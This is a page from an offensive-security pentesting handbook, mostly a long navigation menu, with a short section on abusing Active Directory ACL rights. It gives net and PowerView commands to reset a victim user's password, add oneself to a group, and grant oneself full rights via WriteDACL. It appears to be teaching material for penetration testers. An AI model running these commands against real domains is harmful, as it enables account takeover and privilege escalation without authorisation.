🔴
Hacking
  • 1. Hacking Infrastructure
    • Infra Planification
      • Infrastructure Diagram & Requirements
    • Infra Configuration
      • Attack Server
      • C2 Server
      • Redirector
      • Payload Server
      • Phishing Server
  • 2. Reconnaissance and Information Gathering
    • OSINT (Open-Source Intelligence)
      • Enviroment
      • Android Virtualization
      • Web Browsers
      • Sock Puppets (Covert Accounts)
      • All-purpose Advanced Tools
      • Search Engines
      • People Search Engines
      • Websites & Domains
      • IP Addresses
      • Users & Emails
      • Social Media
      • Documents
      • Images
      • Videos & Lives
      • Metadata
      • Telephone Numbers
      • Online Maps
      • Virtual Currencies
      • Leaks, Breaches, Logs and Ransomware
      • Government & Business Records
    • Port, Version, Vuln Scanning
      • Nmap
      • Shodan
      • Network Mapping
      • Researching Potential Vulnerabilities
      • Dark Web Scanning
  • 3. Social Engeniering
    • Phising
      • Recycling Domains
      • Header Manipulation
      • Email Creation and Delivery
      • Email Spoofing & Warning Disabling
      • Site Building
      • Evilginx
      • Payload Hosting Obfuscation
      • Diverting the Analysts
      • VBA Macros & RTI
      • HTML Smuggling & HTA Files
      • JS Files
      • Other File Types
    • SMS Spoofing
      • SMSpubli
    • Social Engineering Toolkit (SET)
      • SET Installation
  • 4. Exploitation
    • Password Cracking
      • SetUp
      • Wordlist Building
      • Tools
    • Payloads - File Transfer - Coding - MalDev - ExploitDev
      • Payload Triggering
        • Shell File Transfer
        • PS Execution - Donwload Craddles
      • Normal Shells
        • Reverse Shells vs Bind Shells
        • Direct Reverse Shell Commands
        • Interactive Shell
        • Normal Reverse Shell Tools
        • PHP Webshells
        • ASPX Webshells
        • Kraken Webshell
        • Python Webshells
      • Coding Basics
        • Bash
        • Python
        • C
        • C++
        • C#
        • x86-64 (Intel) Assembly - NASM & MASM
      • Windows MalDev
        • MDLC & Tools
        • Architecture, Memory Management, APIs & Processes
        • PEs & DLLs
        • Malware Binary Signing & Metadata Modification
        • Payload Placement
        • Payload Execution Control
        • Payload Encryption & Obfuscation
        • Malware Optimization: Entropy Reduction & Compile Settings
        • Local Payload Execution
        • Process Enum, Injection & Hollowing
        • Payload Staging
        • Thread Hijacking
        • APC Injection
        • Callback Code Execution
        • Mapping Injection
        • Function Stomping Injection
        • PPID Spoofing
        • Process Argument Spoofing
        • API Hooking
        • String Hashing
        • IAT Hiding, Obfuscation & Camouflage
        • Anti-Debugging
        • Anti-Virtualization
        • Syscalls
        • NTDLL Refreshing
      • Windows ExploitDev
        • Tools
        • x86 Vanilla Stack BOF
      • Linux ExploitDev
        • BOF GNU/Linux 32-bit
    • Active Directory
      • Host and Domain Recon
        • SMB (139,445) Enum
        • RPC (135, 1024-5000) Enum
        • LDAP (389,636,3268,3269) Enum
        • PowerView
        • Other tools / Commands
        • BloodHound
      • Attacks and procedures
        • Password Spraying
        • User Impersonation
        • Lateral Movement
        • Kerberos (88)
        • Certificate Services (AD CS)
        • ACLs/ACEs
        • Group Policy
        • MS SQL Servers
        • LAPS (Local Administrator Password Solution)
        • Microsoft Configuration Manager
        • Domain Dominance
        • Forest & Domain Trusts
        • MiTM & Relaying Attack
    • Cloud
      • Azure
        • Basic Info
        • Initial Access
        • Enumeration
        • Privilege Escalation
        • Lateral Movement
        • Persistence
        • Data Exfiltration
      • AWS
        • Basic Info
        • Initial Access
        • Enumeration
        • Privilege Escalation
        • Lateral Movement
        • Post-Exp & Persistence
        • Data Exfiltration
      • Google Cloud
        • Basic Info
        • Initial Access
        • Enumeration
        • Privilege Escalation & Lateral Movement
        • Credential Access
        • Data Exfiltration
    • Web
      • Fingerprinting
      • Automated Scanners
      • Proxies
        • WAFs & Attack Obfuscation
        • HTTP Request Smuggling
      • CMS's: Content Management Systems
      • Authentication
        • Authentication vulnerabilities
        • OAuth 2.0 Authentication Vulnerabilities
        • Access Control
      • Files
        • File Upload
      • Reflected Values
        • Command Injection
        • HTML & XSS Injection
        • SSRF: Server-Side Request Forgery
        • SSTI: Server-Side Template Injection
        • CRLF Injection
        • CSV Injection
        • Openredirect
        • Prototype Pollution
        • ShellShock Attack
      • Search functionalities
        • LFI - RFI - Path traversal
        • SQL Injection
        • NoSQL injection
        • LDAP Injection
        • XPath Injection
      • Forms, WebSockets and PostMsgs
        • CSRF: Croos-Site Request Forgery
        • WebSocket Attacks
      • HTTP Headers
        • Clickjacking
        • CORS
        • Host Header Injection
      • Structured objects - Specific functionalities
        • XML External Entity (XXE) Injection
        • Deserialization Attacks
        • Padding Oracle Attack
      • Whitebox
        • Source Code Recovery, Analysis & Debugging
        • Python PoC Building
        • File Upload
        • SQL Injection
        • JavaScript Injection
        • SSTI (Server-Side Template Injection)
        • PHP Type Juggling
        • Prototype Pollution
        • Password Reset Attacks
    • Network Services
      • FTP 21
      • SSH 22
      • DNS 53,5353
      • FINGER 79
      • POP3 110,995
      • SNMP 161,162,10161,10162
      • MYSQL 3306
      • VNC 5800,5801,5900,5901
      • Ansible
      • Artifactory (8081)
      • Citrix
    • Wireless Pentesting
      • Wireless Reconnaissance
      • Wifite
      • RogueAP
      • WiFi Pineapple Mark VII
    • Camera Pentesting
      • Identifying Unsecured Web Cams
      • Default Passwords
      • Cameraradar
    • SCADA/ICS
      • Reconnaissance
      • Metasploit Modbus
      • modbus-cli
    • Mobile Pentesting
      • Enviroment SetUp
      • Android Pentest
      • iOS Pentest
  • 5. Privesc and Post-explotation
    • Linux Privilege Escalation
      • Manual Testing Elevation of privileges
      • Enumeration Commands
      • Enumeration Scripts
      • Looting for passwords & Interesting Information
      • Writable Files
      • SUDO
      • SSH Key
      • Scheduled tasks
      • SUID
      • Capbilities
      • NFS Root Squashing (Network File Sharing)
      • Shared Library
      • Docker Breakeout
      • Hijack TMUX session
      • Wildcard
      • Kernel Exploits
    • Linux Post-Explotation
      • SSH Backdoor
      • Manual Backdoors
      • Pillaging/Data Harvesting
    • Windows Privilege Escalation
      • Enumeration Scripts
      • Manual Enumeration
      • Metasploit tools
      • Processes Enumeration and Tasks
      • Incorrect permissions in services
      • Unquoted Service Paths
      • Insecure GUI Apps
      • Autorun
      • AlwaysInstallElevated
      • $PATH Interception
      • Looting for passwords
      • Runas
      • Impersonation Privileges
      • From local administrator to NT SYSTEM
      • Common Vulnerabilities and Exposure (CVE)
      • Kernel Exploitation
      • Named Pipes
      • Vulnerable Drivers
      • Abusing Shadow Copies
    • Windows Post-Explotation
      • Credential Theft
      • RDP Hijacking
      • Session Spying
      • WDigest
      • User backdoor
      • Manual Backdoors
      • SharPersist
      • WMI Event Subscriptions Persistance
      • Hunting for COM Hijacks
      • Mail Harvesting
    • Data Exfiltration
  • 6. Evasion Techniques
    • Linux - Evasion Techniques
    • Windows - Evasion Techniques
      • Detection Mechanisms & Evasion Techniques
      • Microsoft Defender Antivirus
      • AMSI & UAC Bypasses
      • AppLocker and Powershell CLM
      • PowerShell Script Block Logging
      • MDE (Microsoft Defender for Endpoint)
      • Altered scripts & Automations
      • Command Reimplementation C#/C
      • EDR Killing
  • 7. Tunneling
    • Port Forwarding
      • SSH Port Forwarding
      • Chisel Port Forwarding
      • Metasploit SSH Port Forwarding
    • Pivoting
      • Linux Tools & Methedology
      • Windows Tools
      • SSH Pivoting
    • C2 (Command and Control)
      • Cobalt Strike
        • Set Up and Team Server
        • Listeners
        • Payloads
        • Attacks
        • Beacon Commands
        • Session Passing
        • Maleable Profiles
        • Artifact Kit
        • Resource Kit
        • Behavioural Detections
        • Aggressor Scripts
        • Beacon Object Files (BOFs)
        • NTLM Relaying Methodology w/ Cobalt
      • Metasploit
        • Schema Cheat Sheet
        • Staged vs Non-Staged Payloads
        • Metasploit Options
        • Start MSF DB (Kali)
        • Listeners
        • Meterpreter Commands
        • Pivoting
        • Meterpreter Pass a Shell
        • Msfvenom Payloads
        • Meterpreter Pillaging/Data Harvesting
      • Havoc
        • Set Up and Team Server
        • Listeners
        • Payloads
        • Deamon Commands
      • Empire
      • Custom C2s
        • HTTP mini C2
  • 8. Profesional Reports
    • LaTeX
      • Tools
      • Variable Config
      • Template definition & PDF Preview
      • Commands
      • Pentest Report Template
    • Documentation Tools
      • Note-Taking
      • Advanced Text Editors
      • Appendix
      • Quality and Diversity of Sources
      • Document Sanitization
    • Report Anatomy
      • OSINT Report Anatomy
Powered by GitBook
On this page
  1. 4. Exploitation
  2. Active Directory
  3. Attacks and procedures

ACLs/ACEs

- GenericAll and AllExtendedRights

Once located an user on which we have GenericAll or AllExtendedRights access rights with PowerView, we can change it's password:

net user vulnuser Password123! /domain

Once located a group on which we have GenericAll access rights with PowerView, we can add ourselfs to it:

net group testgroup user /add /domain

- WriteDACL

Once located an user on which we have WriteDACL access rights with PowerView, we can add the GenericAll access right to it:

Add-DomainObjectAcl -TargetIdentity vulnuser -PrincipalIdentity {our user} -Rights All

- User-Force-Change-Password

Once located an user or group that has User-Force-Change-Password rights over another user with PowerView, we must load PowerView within a session of the user who has rights or ir part of the group that has those rigths and execute the following command:

Set-DomainUserPassword -Identity Vulnuser -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose

PreviousCertificate Services (AD CS)NextGroup Policy

Last updated 1 year ago